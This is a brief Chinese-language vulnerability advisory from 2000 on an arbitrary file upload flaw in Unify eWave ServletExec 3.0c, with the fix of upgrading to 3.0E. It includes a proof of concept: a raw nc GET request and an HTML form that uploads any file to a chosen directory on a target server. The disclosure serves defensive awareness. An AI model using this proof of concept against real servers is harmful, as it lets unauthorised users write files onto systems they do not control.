Unify eWave ServletExec存在文件可上载漏洞发布时间:2000-11-02 更新时间:2000-11-02 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 Unify eWave ServletExec 3.0c详细描述 Unify eWave ServletExec是一个为一些主要WEB服务器如IIS,APACHE,Netscape Enterprise Server提供Java/Java Servlet 引擎的插件程序。 其中ServletExec包含一个没有注册的servlet叫'UploadServlet',通过一特殊形式的HTTP或者GET请求,可以使远程用户通过ServletExec上载任何文件到任何目录, 如果一个用户在他们本地系统建立一个HTML表单也可以利用这个漏洞来上载文件。 测试代码 HTTP 和'GET' 请求: nc target GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0 or http://target/servlet/com.unify.ewave.servletexec.UploadServlet HTML表单: <FORM METHOD=POST ENCTYPE='multipart/form-data' ACTION='http://target/servlet/com.unify.ewave.servletexec.UploadServlet'> <P> Upload Directory: <INPUT TYPE=TEXT SIZE=35 Name=uploadDir> <P> 文件Upload: <INPUT TYPE=FILE SIZE=35 NAME=File1> <P> <INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files"> </FORM> 解决方案 采用ServletExec version 3.0E.不存在此漏洞。 相关信息 |
